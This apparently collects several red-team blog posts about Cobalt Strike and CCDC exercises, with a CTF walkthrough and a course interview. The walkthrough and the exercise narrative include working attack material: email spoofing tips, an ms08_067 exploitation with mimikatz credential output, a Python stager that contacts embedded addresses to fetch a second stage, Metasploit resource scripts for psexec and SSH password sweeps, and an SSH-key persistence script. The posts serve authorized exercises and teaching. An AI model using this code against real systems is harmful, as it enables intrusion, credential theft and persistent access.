So far, in this post, I’ve raised your awareness of message delivery, how it works, and what stops it. If you’re planning to spoof a message from another domain:

  • Check if the domain has an SPF, DMARC, or DKIM record. The mail server that receives your phish has to verify these records–but if they don’t exist, there’s nothing for it to verify.
  • Try to send your message to an inbox you control through email infrastructure that is similar to your client’s. For example, many corporations use Outlook and Exchange. Microsoft Outlook has its own junk filter. Email yourself at your corporate address to see how Microsoft’s junk filter processes your message content.
  • Reconnaissance is your friend. Send a message to a non-existent user at the domain you’re trying to send a phish to. Make sure MAIL FROM is an address that you control. If you’re lucky, you will get a non-delivery notice. Inspect the headers from the non-delivery notice to see your spam score, SPF score, and other indicators about your message. If you get a non-delivery notice–it’s likely that your message passed other pre-delivery checks (a local junk filter may still send your message to the spam folder though).

For Cobalt Strike users, here’s how this advice maps to the built-in spear phishing tool:


If all else fails–go legitimate. There’s no hard requirement that you must phish from a spoofed domain. Try to register a phishing domain that relates to a generic pretext. Create the proper SPF, DKIM, and DMARC records. Use this domain when you need something that looks legitimate. There’s nothing wrong with this approach–so long as your message makes it to the target user and it gets clicks.

Finally, don’t get discouraged when you can’t get a spoofed message to your Gmail account. Large webmail providers are early adopters and consumers of standards such as DKIM, SPF, and DMARC. It’s possible that your corporate pen testing client hasn’t heard of this stuff. Once you complete a successful phishing engagement–you can suggest these things in your report.

Telling the Offensive Story at CCDC

The 2013 National CCDC season ended in April 2013. One topic that I’ve sat on since this year’s CCDC season ended is feedback. Providing meaningful and specific feedback on a team-by-team basis is not easy. This year, I saw multiple attempts to solve this problem. These initial attempts instrumented the Metasploit Framework to collect as many data points as possible into a central database. I applaud these efforts and I’d like to add a few thoughts to help them mature for the 2014 season.

Instrumentation is good. It provides a lot of data. Data is good, but data is dangerous. Too much data with no interpretation is noise. As there are several efforts to collect data and turn it into information, I’d like to share my wish list of artifacts that I’d like to see students get at the end of a CCDC event.

1) A Timeline

A timeline should capture red team activity as a series of discrete events. Each event should contain:

  • An accurate timestamp
  • A narrative description of the event
  • Information to help positively identify the activity (e.g., the red IP address)
  • The blue asset involved with the event
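As a sketch of what one such event record might carry, here is a simple record type covering the four fields above. The field names are my own, not from any particular tool.

```python
from dataclasses import dataclass
from datetime import datetime

@dataclass
class RedTeamEvent:
    timestamp: datetime  # accurate time of the activity
    description: str     # narrative description of the event
    red_source: str      # identifying information, e.g., the red IP address
    blue_asset: str      # the blue team asset involved

# Hypothetical example event.
event = RedTeamEvent(
    timestamp=datetime(2013, 4, 20, 10, 15),
    description="Uploaded persistence to the web server",
    red_source="10.1.2.3",
    blue_asset="team5-web",
)
print(event.blue_asset)
```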

A complete timeline is valuable as it allows a blue team to review their logs and understand what they can and can’t observe. If they’re able to observe activity, but didn’t act on an event, then the team knows they have an operational issue with how they consume and act on their data.

If a team can’t find a red event in their logs, then they have a blind spot and they need to put in place a solution to close this gap.

In a production environment, the blue team has access to their logs on a day-to-day basis. In an exercise, the blue team only has access to the exercise network during the exercise. I recommend that blue teams receive a red team timeline and that they also get time after the competition to export their logs for review during the school year.

These red and blue log artifacts would provide blue teams a great tool to understand, on their own, how they can improve. Access to these artifacts would also allow students to learn log analysis and train throughout the year with real data.

Cobalt Strike’s activity report is a step in this direction. It interprets data from the Metasploit Framework and data collected by Cobalt Strike to create a timeline and capture this information. There are a few important linkages missing though. For example, if a compromised system connects to a stand-alone handler/listener, there is no information to associate that new session with the behavior that led to it (e.g., did someone task a Beacon? did the user click on a client-side attack? etc.).

2) An Asset Report

An asset report describes, on an asset-by-asset basis, how the red team views the asset and what they know about it.

Most penetration testing tools offer this capability. Core Impact, Metasploit Pro, and Cobalt Strike generate reports that capture all known credentials, password hashes, services, vulnerabilities, and compromises on a host-by-host basis.

These reports work and they are a great tool for a blue team to understand which systems are their weakest links.

A challenge with these reports is that a CCDC red team does not use a single system to conduct activity. Some red team members run attack tools locally, others connect to multiple team servers to conduct different aspects of the engagement. Each system has its own view of what happened during the event. I’m taking steps to manage this problem with Cobalt Strike. It’s possible to connect to multiple team servers and export a report that intelligently combines the point of view of each server into one picture.

I saw the value of the asset report at Western Regional CCDC. I spent the 2-3 hour block of networking time going over Cobalt Strike’s hosts report with different blue teams. Everyone wanted me to scroll through their hosts. In the case of the winning team, I didn’t have to say anything. The students looked at their report, drew their conclusions, and thanked me for the helpful feedback. The hosts report gave the blue teams something concrete to judge whether they were too complacent or too paranoid. Better, this information helped them understand how close we were to making things much worse for them.

Whether this type of report comes from a penetration testing tool or these competition-specific solutions under development, I recommend that red teams provide an asset-by-asset report. The students I interacted with were able to digest this information quickly and use it to quickly answer some of their open questions.

3) A Vulnerability Report

During a CCDC event, the red team only uses one or two exploits to get a toehold. We then leverage credentials for the rest of the event. Still, I’m often asked “which exploits did you use?” A report of which vulnerabilities were used will answer these questions.

4) A Narrative

The item that completes the feedback is the narrative. The narrative is the red team member telling the story of what they did at a very high level. A short narrative goes a long way to bring life to the data the blue team will have to sift through later.

I believe telling stories is something CCDC red teams do well. At a typical CCDC debrief, red team members will share their favorite moments or wins during the event. Without context, this story is anecdotal. Combined with the data above, it’s something actionable. Now the blue teams know what they should look for when they’re analyzing the log files.

The narrative provides blue teams with a starting point to understand what happened. The data we provide them will give them the opportunity to take that understanding to the next level.

5) Sizzle

During a security assessment, I’m not doing my job if I just explain what I did. It’s my job to ally with my blue counterparts and actively sell our client’s leadership on the steps that will improve their security posture. When communicating with non-technical folks, a little sizzle goes a long way. I like to record my screen during an engagement. At the end of the engagement, I cut the interesting events from the recording and create short videos to show the high points. Videos make it easier to understand the red perspective. If a video involves an event that both the red team and blue team experienced together, I find watching the video together creates a sense of a shared experience. This can go a long way towards building rapport (a key ingredient in building that alliance).

To record my screen, I use ScreenFlow for Mac OS X. 20 hours of screen recording (no audio) takes up a few gigabytes, nothing unreasonable.

In this post, I listed five artifacts we can provide blue teams to better tell the offensive story. I’ve pointed at examples where I could. Beware though, if actionable feedback were as easy as clicking a button to generate a report, this blog post wouldn’t exist. Reporting is challenging in an environment where 20 experts are actively participating in 10 engagements with multiple toolkits. As different parties build data collection platforms, I hope to see an equal effort towards data interpretation. These artifacts are some of the things I’d like to see come out of the data. What artifacts do you think would help?

Goading Around Firewalls

Last weekend, I was enjoying the HackMiami conference in beautiful Miami Beach, FL. On Sunday, they hosted several hacking challenges in their CTF room. One of the sponsoring vendors, a maker of network security appliances, set up a challenge too. The vendor placed an unpatched Windows XP device behind one of their unified threat management devices. The rules were simple: they would allow all traffic inbound and outbound, through a NAT, with their intrusion prevention technology turned on. They were looking for a challenger who could exploit the Windows XP system and get positive command and control without their system detecting it.


I first heard about this challenge from an attendee who subjected me to some friendly goading. “You wrote a custom payload, your tools should walk right through it”. Not really. Knowing the scenario, my interest in participating was pretty low. I can launch a known implementation of ms08_067_netapi through an Intrusion Prevention Device, but to what end? I fully expected the device to pick it up and squash my connection. The Metasploit Framework has a few evasion options (type show evasion, the next time you configure a module), but I expected limited success with them.

The representatives from the vendor were pretty cool, so I opted to sit down and see what they had. The vendor rep told me the same network also had a Metasploitable Virtual Machine. This immediately made life better. My first act was to try to behave like a legitimate user and see if that worked. If legitimate traffic can’t go through, then there’s little point trying a hacking tool.

I ran ssh and I was able to login with one of the known weak accounts against the Metasploitable Virtual Machine. Funny enough, this was a painful act. One person thought they could get past the device by attempting a Denial of Service, hoping to make it fail open by default. Another person wanted to further everyone’s learning and decided to ARP poison the network. Narrowing down these hostile factors took some time away from the fun.

A static ARP entry later and I was ready to try the challenge again. I’ve written about tunneling attacks through SSH before, but the technique is so useful, I can’t emphasize it enough.

First, I connected to the Metasploitable Linux system using the ssh command. The -D flag followed by a port number allows me to specify which port to set up a local SOCKS proxy server on. Any traffic sent through this local SOCKS proxy will tunnel through the SSH connection and come out through the SSH host.

ssh -D 1080 [email protected]

Next, I had to instruct the Metasploit Framework to send its traffic through this SOCKS proxy server. Again, easy enough. I opened a Metasploit Framework console tab and typed:

setg Proxies socks4:

The setg command globally sets an option in the Metasploit Framework. This is useful for Armitage and Cobalt Strike users. With setg, I can set this option once, and modules I launch will use it.

Finally, I had to find my target. The vendor had set up a private network with the target systems. I typed ifconfig on the Metasploitable system to learn about its configuration. I then ran auxiliary/scanner/smb/smb_version against the private network Metasploitable was on.

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set THREADS 24
THREADS => 24
msf auxiliary(smb_version) > set SMBDomain WORKGROUP
msf auxiliary(smb_version) > set RHOSTS
RHOSTS =>
msf auxiliary(smb_version) > run -j
[*] Auxiliary module running as background job
[*] Scanned 049 of 256 hosts (019% complete)
[*] Scanned 062 of 256 hosts (024% complete)
[*] Scanned 097 of 256 hosts (037% complete)
[*] is running Windows 7 Professional 7601 Service Pack (Build 1) (language: Unknown) (name:FGT-XXXX) (domain:WORKGROUP)
[*] is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] is running Windows XP Service Pack 3 (language: English) (name:XXXX-44229FB) (domain:WORKGROUP)
[*] Scanned 119 of 256 hosts (046% complete)
[*] Scanned 143 of 256 hosts (055% complete)
[*] Scanned 164 of 256 hosts (064% complete)
[*] Scanned 191 of 256 hosts (074% complete)
[*] Scanned 215 of 256 hosts (083% complete)
[*] Scanned 239 of 256 hosts (093% complete)
[*] Scanned 256 of 256 hosts (100% complete)

Once I discovered the IP address of the Windows XP system, I was able to launch exploit/windows/smb/ms08_067_netapi through my SSH proxy pivot. This, in effect, resulted in the exploit coming from the Metasploitable system on the same private network as the Windows XP target. I used a bind payload to make sure Meterpreter traffic would go through the SSH proxy pivot as well.


At this point, I had access to the Windows XP system and I was able to take a picture of the vendor with his webcam and use mimikatz to recover the local password. Still undetected.

meterpreter > use mimikatz
Loading extension mimikatz...success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
[*] wdigest credentials

AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;999    NTLM       WORKGROUP        XXXX-44229FB$
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE
0;54600  NTLM
0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE
0;62911  NTLM       XXXX-44229FB     Administrator     password123!

There’s a lesson here. Don’t attack defenses, go around them.

Red Team Training at BlackHat USA

Before developing Cobalt Strike, I conducted interviews with several penetration testing practitioners. I wanted to dig into their process, the tools they used, the gaps they saw, etc. Three folks from the Veris Group sat down with me for three hours to go over these very questions. It was at this time, I became familiar with David McGuire and Jason Frank.

Our relationship has evolved to the point where they advise on Cobalt Strike, teach the product, and Veris Group is also a Cobalt Strike customer.

At BlackHat USA, Veris Group will teach two courses: Adaptive Penetration Testing and Adaptive Red Team Tactics. These two offerings grew out of their Adaptive Penetration Testing course which they’ve taught at BlackHat USA the past few years.

Last year, David and Jason approached me and offered to include Cobalt Strike on the DVD they provide to the students of their course. This then evolved into including a lab with Cobalt Strike, which then evolved into them opting to use Cobalt Strike as the platform to demonstrate their Adaptive Penetration Testing process.

I have my own course offerings, but my offerings are focused only on my toolset. These courses will give you the foundation to set up a complete red team and penetration testing assessment process using Cobalt Strike and other tools. Their perspective is available once a year at BlackHat USA; I highly recommend that you take advantage of it.


To give you some more insight into these courses, I’d like to share an interview I conducted with Jason and David on their BlackHat courses:

1. How many times have you taught at Black Hat and what made you want to teach there?

David and Jason: We’ve had the opportunity to teach the class twice at Black Hat USA and once at Black Hat UAE. Black Hat provides smaller independent trainers like us, who don’t do this full time, with a great venue to reach a broad potential audience. They handle all the logistical work (such as securing a venue, billing and marketing) so we can focus on delivering quality course material that benefits our students. We are very appreciative of the opportunity they give small trainers and the working relationship we’ve been able to establish.

2. In your words, what are the differences between the Adaptive Penetration Testing and Adaptive Red Team Tactics courses?

David and Jason: The focus of Adaptive Penetration Testing (APT) is to provide students with a framework for providing comprehensive assessments with the objective of demonstrating the risk, in terms of business impact, of potential system breaches. The end goal is for students to be able to take the techniques, procedures, and methodologies we have developed through our experience and implement them in their own operational environments. Assessments utilizing the methodology we discuss in APT are targeted to take one to two weeks to execute effectively.


Adaptive Red Team Tactics (ARTT) is meant as a follow-on to APT and focuses on emulating a more advanced threat. This course covers more advanced tactics, techniques and procedures (TTPs) that enable our students to provide a more realistic assessment of defense, detection, and response capabilities in organizations with mature IT security programs. Red Team assessments generally have an extended assessment window and incorporate techniques for providing a more covert, “low and slow,” assessment with a heavy focus on intelligence gathering and long-term post-exploitation activities. Stealth, evasion, robust persistence, and data exfiltration are some of the main themes of ARTT.


3. What is the secret sauce of your courses? What will you teach that students can’t get elsewhere?

David and Jason: We focus heavily on the tools, techniques and methodologies that we have developed through our experience performing assessments and building internal penetration testing programs for our customers. While we thought there was some really great training out there, we felt there was an opportunity for us to fill a legitimate need in the industry by offering training that focuses on how to effectively conduct assessments in operational environments. In our courses, we want to make sure students understand the entire process of executing a Penetration Test or Red Team assessment, including everything from scoping to exploiting systems to delivering a comprehensive report.  We structure and deliver our course material so students walk away from the course with something they can easily use as a reference when conducting their own assessments. We also include templates and other material that offer students a foundation for creating a program/service from the ground up.


We think another big differentiator in our courses is our incorporation of Cobalt Strike. We feel that one of the gaps in a lot of training out there is that they do not effectively cover the professional tools that can assist in delivering efficient, effective, and repeatable assessments. Cobalt Strike is a full-fledged toolset we use every day in our penetration tests and red team assessments. It enables us to save a lot of time in execution and have quick access to some powerful capabilities. We believe that when testers are in the middle of an assessment, they should be able to focus on assessing the risk/business impact of breaches for their customer, not wrestling with their tools. Tools don’t make the tester, but knowing which tools can best augment your capabilities is often as important as knowledge of great penetration testing techniques.

Raphael: *cough* *cough* Last year, I spent some time with David and Jason at the Veris Group headquarters. Jason constantly rolled his eyes at David and me. Apparently, when we sit down together, we’re like two Furbies going into an infinite loop. Once we broke out of our chat routine, I sat down to go through their labs. I couldn’t do them. David and Jason kept providing hints, but I really did not know. The labs were related to lateral movement and abusing trust relationships. This is a topic that I don’t feel is well covered in other places and their courses both address this topic with a lot of depth.


4. Why isn’t this material taught in other places?

David and Jason: Many courses seem to focus either on foundational knowledge of penetration testing, or technical intricacies of various advanced techniques. While a lot of these are really great courses, we felt they often didn’t leave students with the ability to go execute well-planned and comprehensive assessments on their own. We designed APT for students who don’t need more foundational knowledge, but do need to run effective assessments to add value for their customers. Many courses also focus on tools and techniques that are freely available, but operational penetration testing teams use the most effective tools for the job, whether freely available or commercial. We wanted to train on tools and techniques that students would actually use in the field.

When it comes to ARTT, we felt there are few advanced penetration testing courses available, especially relative to the number of courses that teach the fundamentals. Those that are available typically focus on techniques such as exploit development, but few seem to focus on emulating the techniques of the advanced threats that are actually targeting organizations today. We bring our experience in conducting red team assessments for the Federal government, where the objective is to analyze systems the way an adversary would versus utilizing the latest and greatest esoteric technique.


5. How did Cobalt Strike end up in your courses?

David and Jason: When we first developed the APT course, we faced the same limitation most courses do: many of the tools we were teaching weren’t the ones we actually used on assessments. One of the only tools that came close to something we could use operationally was Armitage. As Cobalt Strike was a natural progression from Armitage, when it was released, we found it was the perfect fit for our primary penetration testing platform. In keeping with our objective of training for operational testing, we also thought this was a great opportunity to showcase the capabilities a professional toolset can provide. We found Raphael had much of the same mindset for penetration testing and training we did and was enthusiastic about assisting us in improving our training offering. Cobalt Strike was exactly what the course intended to provide, a turn-key approach to accomplish common, sometimes tedious, tasks so the assessor can spend more time performing effective threat emulation.

Way to sell them on buying Cobalt Strike guys -- Raphael

Cobalt Strike was actually one of the primary reasons we were able to offer the ARTT course this year. One of the significant barriers to teaching (and conducting) red team assessments is the specialized toolsets red teams use. These toolsets are generally highly specialized, require a significant amount of support, and are almost never released. These issues make training red team tactics much more difficult. However, over the past year Raphael added many red team capabilities to Cobalt Strike. While Cobalt Strike is great for enabling a standard penetration testing team to emulate more advanced threats, it also gave us the opportunity to train on many of the more advanced tactics we use in our red team assessments.

Raphael: I know the real story. A few years ago, David and Jason were teaching Adaptive Penetration Testing. One of their students used Armitage to chew through their entire exercise environment, like it was nothing (this is a very common Armitage story–in many classrooms). This is what got their attention and it’s part of what got us talking in the first place. 🙂

6. Who should take your courses?

David and Jason:

  • Penetration testers and/or managers with prior knowledge/training/experience who are looking to maximize their programs
  • Individuals interested in starting a penetration testing capability
  • Penetration testers and/or managers with prior knowledge and experience with penetration testing tools and techniques interested in emulating a more sophisticated threat capability
  • Individuals who would like a better understanding of the tactics, techniques and procedures of more advanced adversaries

Raphael: If you’re a prospective (or active) Cobalt Strike user, I highly recommend signing up for one of these courses. If you’re planning to use Cobalt Strike in a variety of engagements, take Adaptive Penetration Testing. If you’re primarily focused on threat emulation and red teaming, take Adaptive Red Team Tactics. David and Jason are very experienced in the subject matter they’re teaching. They know Cobalt Strike and we view threat emulation and penetration testing through the same lens.

National CCDC Red Team – Fair and Balanced

Saturday, 6:30pm ended my 2013 red teaming season. I’ve participated in the Collegiate Cyber Defense Competition as a red team volunteer since 2008. I love these events primarily because of the opportunity I get to interact with the student teams and learn from my peers in this field. But, since 2011, I’ve also traveled to these events with an agenda of exercising my tools, testing improvements, and getting new ideas.

2013 was the first year I had an opportunity to exercise Cobalt Strike and its capabilities at these events. CCDC exercises don’t offer a client-side attack surface, which takes some Cobalt Strike features out of play. However, its collaboration capabilities, Cortana scripting, Beacon agent, and the ability to manage multiple team servers are all very relevant to a CCDC red team.

I wrote about my experiences at the Western Regional Collegiate Cyber Defense Competition, now I’d like to share what happened on the National CCDC Red Team.

I showed up to San Antonio, TX exhausted. I had spent the previous week participating in two exercises: the Mid-Atlantic CCDC event and another grueling (but very challenging and fun) exercise. Once I got to San Antonio, I had dinner with my fellow red team members and I crashed out. I made it to the red team room at about 9:15am, approximately 45 minutes before go time.

This was my second year on the National CCDC Red Team. The National CCDC Red Team operates differently from the regionals. Where regionals are generally a free for all, the National team assigns two red team members to each blue team. We’re allowed to perform actions against other teams, but we must focus on our assigned team first, and we must not disrupt or step on the red team members who own that particular blue team.

When I described this model to my girlfriend, she immediately objected and stated–“that’s not fair! what happens if one team gets less skilled people assigned to them”. Hear me out, this model can work, and during the 2013 National CCDC–we provided the fairest and most balanced red experience I’ve seen at a CCDC event yet.


I spent the 45 minutes before the event getting my initial attack kit prepped. One role I usually fill at CCDC events is initial exploitation and persistence. The Red Team was assigned several IP address ranges. Our team captain, David Cowen, parceled them out by assigning each red team member a set of last-octet values they could bind across all of the ranges.

Once I knew my addresses, I loaded a Cortana script that allows me to generate my persistence artifacts with the appropriate addresses. At CCDC, student teams are allowed to install anti-virus. Unfortunately, most artifacts generated by the Metasploit Framework are caught by anti-virus. I didn’t want to make it that easy to clean us out. So, I opted to write a persistent stager for the CCDC events this year. This stager ships with several addresses embedded in it. Once it is run, it will attempt to connect to each of these addresses, one per minute, until it successfully downloads the second stage of my malware and injects it into memory. Because this code is not in use elsewhere, no anti-virus product that I’d have to worry about at CCDC catches it.
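The staging behavior described above can be sketched in Python (my actual stager is custom native code; the addresses, port, and function names below are hypothetical). The connect and wait functions are parameters so the retry logic is easy to exercise on its own.

```python
import socket
import time

# Hypothetical staging addresses baked into the artifact.
ADDRESSES = ["10.1.2.3", "10.1.2.4", "10.1.2.5"]

def stage(addresses, port=4444, connect=socket.create_connection, wait=time.sleep):
    """Try each staging address in turn, one attempt per minute,
    looping forever until a connection succeeds. Returns the
    connected socket, ready to receive the second stage."""
    while True:
        for address in addresses:
            try:
                return connect((address, port))
            except OSError:
                wait(60)  # wait a minute before trying the next address
```

Blocking one address only delays this loop; it rolls on to the next embedded address and comes back around.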

Seriously, this won’t do you that much good.

Pro-tip: if you had found any of my persistence mechanisms and run strings against it, you would have recovered my staging addresses and could have blocked them. Blocking them would have cut off my other backdoors that attempted to stage through the same addresses.
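That defensive check fits in one pipeline. The sketch below fabricates a throwaway file to stand in for a recovered artifact; the filename and embedded addresses are made up for illustration.

```shell
# Stand-in for a recovered persistence binary (placeholder bytes and addresses)
printf 'MZ\220\000junk 192.168.1.50 more 10.10.3.7\000' > /tmp/beachhead.bin

# Pull printable strings and keep anything shaped like an IPv4 address
strings /tmp/beachhead.bin | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u
# prints 10.10.3.7 and 192.168.1.50
```

Each recovered address could then be dropped at the firewall (e.g. an iptables OUTPUT rule), cutting off every backdoor staging through it.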

Anyway, I generated my artifacts before I even had time to bind all of my IP addresses. I set up a local Cobalt Strike instance for the initial attack and was getting ready to set up a team server when, all of a sudden, 10am came and Dave shouted “go! go! go!”.

Opening Salvo

The first minutes of any CCDC event are critical. As a red cell member, I do not see CCDC as a game of patching, installing firewalls, and thwarting an attacker who is attempting to scan and exploit you. I see CCDC as an intrusion detection and response game. I want the students to work under the assumption that an attacker is present, focus on their operational security, and develop creative ways to dig us out, spot our activity, or disrupt our command and control. Truth is, once they patch and set up a firewall, if we don’t have access, we’re likely not going to get it. Intrusions today start with the end user for a reason: these other layers of defense stop the easy stuff.

Contrary to popular belief, I no longer script my opening attack. I’ve moved away from it this year. I found at earlier events that my scripted exploitation would sometimes make assumptions that I would need to correct once I understood reality. The Armitage and Cobalt Strike user interfaces are efficient enough to allow me to think on my feet and simultaneously apply an action against all systems–very quickly.

I start most CCDC events with a db_nmap sweep. I don’t care about discovering each open service. I want the low hanging fruit only. I use nmap -sV -O -T4 --min-hostgroup 96 -p 22,445 across all student ranges to discover the easy exploitation opportunities as quickly as possible.

At National CCDC, student teams have two networks: a local network and a cloud network. This year, I opted to go after their local networks first and follow up against their cloud networks second.

Once a scan comes back, I sort my host display by the operating system icon. I simply highlight all Windows systems and launch the ms08_067_netapi module against them. This year, with Mubix’s worm barred from play, we were given a list of potential default passwords, for the first time in National CCDC history. I used this information to execute psexec against all of the remaining Windows hosts. If I did not have the default credentials, I would use a Cortana script to run Windows Credential Editor to get them.
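For readers without the GUI in front of them, the same two attacks can be sketched as an msfconsole resource script. Everything specific here is a placeholder: the target addresses, the LHOST, and the credential pair.

```shell
# Hypothetical resource script pairing the two opening attacks described above
cat > /tmp/opening_salvo.rc <<'EOF'
# Direct exploit against a likely-unpatched Windows host
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.10.1.15
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.1.250
exploit -j -z

# Default credentials via psexec against another host
use exploit/windows/smb/psexec
set RHOST 10.10.1.16
set SMBUser Administrator
set SMBPass Changeme123
exploit -j -z
EOF

# msfconsole -r /tmp/opening_salvo.rc   # would run both attacks as background jobs
```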


As Windows sessions came in, I had a Cortana script loaded that would automatically install my beachhead executable onto the systems. The persistence mechanics were nothing new. They were very similar to last year’s Dirty Red Team Tricks talk. The beachhead executable’s only purpose was to connect to me, download Beacon, and inject it into memory.

Once I had the Windows systems, I ran the Metasploit Framework’s ssh_login module against all of the UNIX systems with root and each of the suspect default credentials. Armitage and Cobalt Strike tip–hold Shift as you click Launch to run a module but keep the dialog open. This makes it really easy to try multiple variations of an attack very quickly.
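The Shift-click trick is a GUI shortcut for re-running a module with one option changed. Scripted, a sweep like this might look like the resource file below; the target range and wordlist path are placeholders.

```shell
# Hypothetical resource script for the root password sweep described above
cat > /tmp/ssh_sweep.rc <<'EOF'
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.1.0/24
set USERNAME root
set PASS_FILE /tmp/default_passwords.txt
set STOP_ON_SUCCESS true
set THREADS 8
run
EOF

# msfconsole -r /tmp/ssh_sweep.rc   # would try each suspect password as root
```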

Checking out those SSH keys

Once again, I had a Cortana script loaded to automatically install some persistence on the UNIX systems. I didn’t do much to the UNIX systems at National CCDC because I did not want to step on my other red team members. I simply dropped an SSH key for root and altered the SSH configuration to allow the one key to work for any user on the system.
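That UNIX persistence amounts to one key drop and one sshd configuration line. A sketch, written against demo paths so it is safe to read and run as-is; a live version would target /etc/ssh/sshd_config and /root/.ssh/authorized_keys and then restart sshd. The key material is a placeholder.

```shell
# Demo paths; a live version would use the real sshd config and key file
SSHD_CONFIG="${SSHD_CONFIG:-/tmp/demo_sshd_config}"
AUTH_KEYS="${AUTH_KEYS:-/tmp/demo_authorized_keys}"
PUBKEY='ssh-rsa AAAAB3Nza-placeholder redteam'   # placeholder public key

touch "$SSHD_CONFIG"

# 1. Drop the key for root
echo "$PUBKEY" >> "$AUTH_KEYS"

# 2. Point every account's key lookup at that same file, so the one
#    key authenticates as any user on the system
echo "AuthorizedKeysFile $AUTH_KEYS" >> "$SSHD_CONFIG"
```

The second step works because sshd's AuthorizedKeysFile directive applies to all accounts; an absolute path with no per-user token makes one file answer for everyone.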

Team Server

After the opening salvo, I had successfully exploited the Windows systems with port 445 open in the competition environment and I had root access to the UNIX systems with SSH open (except for the Solaris systems assigned to each team). This whole process took 1 to 2 minutes total. In theory, I had backdoors on each of these systems too, but I had no way to know because I had not yet set up a team server.

I went to work setting up a Cobalt Strike team server. Of the four staging addresses I created, I bound only one. Once Cobalt Strike was up, I connected my client to the team server, set up the Beacon listener, and gave it a different list of IP addresses to beacon back to.

Beacon is a Cobalt Strike-specific payload. It doesn’t require a persistent connection to the target; rather, it phones home every so often to request tasks to execute. I created Beacon to act as a quiet (in memory) persistence agent. The idea is you can use it to spawn a new Meterpreter session when it’s needed. In a pinch, Beacon can also act as a remote administration tool if your Meterpreter traffic is squashed by network defenses.

Beacon — give me shell!

Once the listener was up, I noticed my Beacons were coming back and I was able to verify that we had all Windows systems in the competition environment at that time. This really allowed us to give students a fair game. Each team was owned, from the beginning, with the same backdoors.

Cobalt Strike Use

I then spent time getting folks who asked for it set up with Cobalt Strike so they could task their own Beacons. Several tools were in play on the National CCDC Red Team: I saw msfgui, msfconsole, Core Impact, Dark Comet, and Cobalt Strike. There was some Armitage early on too, but I showed those folks how to connect Cobalt Strike to multiple Metasploit Framework instances at once, and that was the end of the Armitage use.

8 out of 10 blue teams had at least one red team member using Cobalt Strike to conduct post-exploitation and gain more access into their network. By my count, 15 out of 20 red cell members were using Cobalt Strike. 12 of the 20 used only Cobalt Strike, primarily through the local team server, with no other penetration testing platform in play. In effect, 8 simultaneous engagements were happening through one team server. Wow!

The workspaces feature helped a lot with this. Each Cobalt Strike user was able to define a workspace that showed them only the hosts, services, and sessions for their team.

Collaborative hacking… at its finest

As a developer, nothing excites me more than seeing someone use a tool I wrote. I’m very honored that so many well respected professionals in this field gave Cobalt Strike’s toolset a try during the National CCDC event.

Other Tools

Some custom stuff was in use during National CCDC. We had a custom Linux backdoor, something that works a lot like Beacon deployed to student systems. We also used Dark Comet to further fortify our access to student systems once the initial salvo was complete. Individually, a few red team members chose to deploy different RATs against their specific team, but I’m not aware of anything else that was done on an all teams basis.

We were also using a data management system developed by Alex Levinson, Maus, and Vyrus to keep track of shared information and automatically track red activity, based on a Metasploit Framework instrumentation plugin. My favorite part of the whole system–it integrates etherpad and I’m in love with etherpad for red team information sharing. It’s much better than a wiki.


Once we were in, post-exploitation was up to each individual cell. Knowing that we had equal access and persistence across all teams, I greatly enjoyed the opportunity to focus on one team. The first day, our job as the red team was to stay in and quietly steal data. We were under strict instructions to not do anything that might reveal our presence. I spent the first day setting up keystroke loggers, downloading interesting files, taking screenshots, and occasionally sweeping the network to try to get access to other hosts that the initial salvo didn’t give us.

Windows Credential Editor is my co-pilot

At the start of day 2, we still had access to Windows systems on all teams’ cloud networks. We also had access to at least one box on most teams’ local networks. Some systems were beaconing to our local team server; a few were beaconing over DNS to a node in Amazon’s elastic computing cloud. The National CCDC event required teams to configure a proxy on each Windows system for it to connect to the internet. This didn’t happen on all systems, limiting my external Beacons. Still, the second pool of accesses was helpful in some cases.

On day two, our team captain started blasting classical music and instructed us to burn all of our boxes. The idea: get in on day 1, stay there, let the students snapshot their virtual machines with our backdoors in place, let them trust their snapshots, and on day 2, destroy their systems. We bounced systems for the first few hours of the day. We would jump on a system, destroy it, the students would restore it, our beacons would phone home, we’d request a Meterpreter session, and then we’d destroy the system again.

blue team: nooooo red team: yes yes yes

This happened all throughout the morning. As a person who likes to keep access until the end, this was scary. Students were put into a catch-22: they could revert to a snapshot with all of the work they did to the system plus our backdoors, or they could revert to a clean image. By the end of the morning, many teams opted to revert to the clean image.

We were able to re-exploit systems hosted in the students’ cloud networks when they were reverted to a clean image, and backdoor them again. That part was pretty easy. As the day went on, one red cell member might make a discovery and call everyone else’s attention to it. We would then work on replicating that discovery against our own teams.

For example, Matt Weeks discovered a webshell pre-implanted by the competition organizers on an internal system. All of us found the webshell on our teams and went to work through it. In the default configuration, this webshell existed on Windows systems, giving us access to internal networks for some of the teams. By this time, access to internal networks was a nice find. We had bounced student systems so many times that the teams reverted to a clean snapshot for their internal systems.

My team had migrated their web server from Windows to Ubuntu Linux. Fortunately, they kept the webshell with the migrated site, giving us access to that system as well.

Each red team member had a good understanding of the point system. We knew, for example, that a root/administrator level intrusion counted once and only once per unique attack vector. There was no point in exploiting systems time and again with the same thing.

We also knew that credit cards and other data flags were worth points.

One of the biggest hits we could make a team take came from publishing credit card information to their website for the whole world to see. We made sure to make this happen for all teams, where it was possible.

Overall, the plan worked. We didn’t achieve Dave’s lifelong dream of seeing every team down for every service across the board. But we were very well organized, we collaborated, and this year we gave the students at the National CCDC event the fairest and most balanced red experience yet.

Congratulations to RIT on its first National CCDC win. Congratulations to Dakota State University on a very close second place finish.
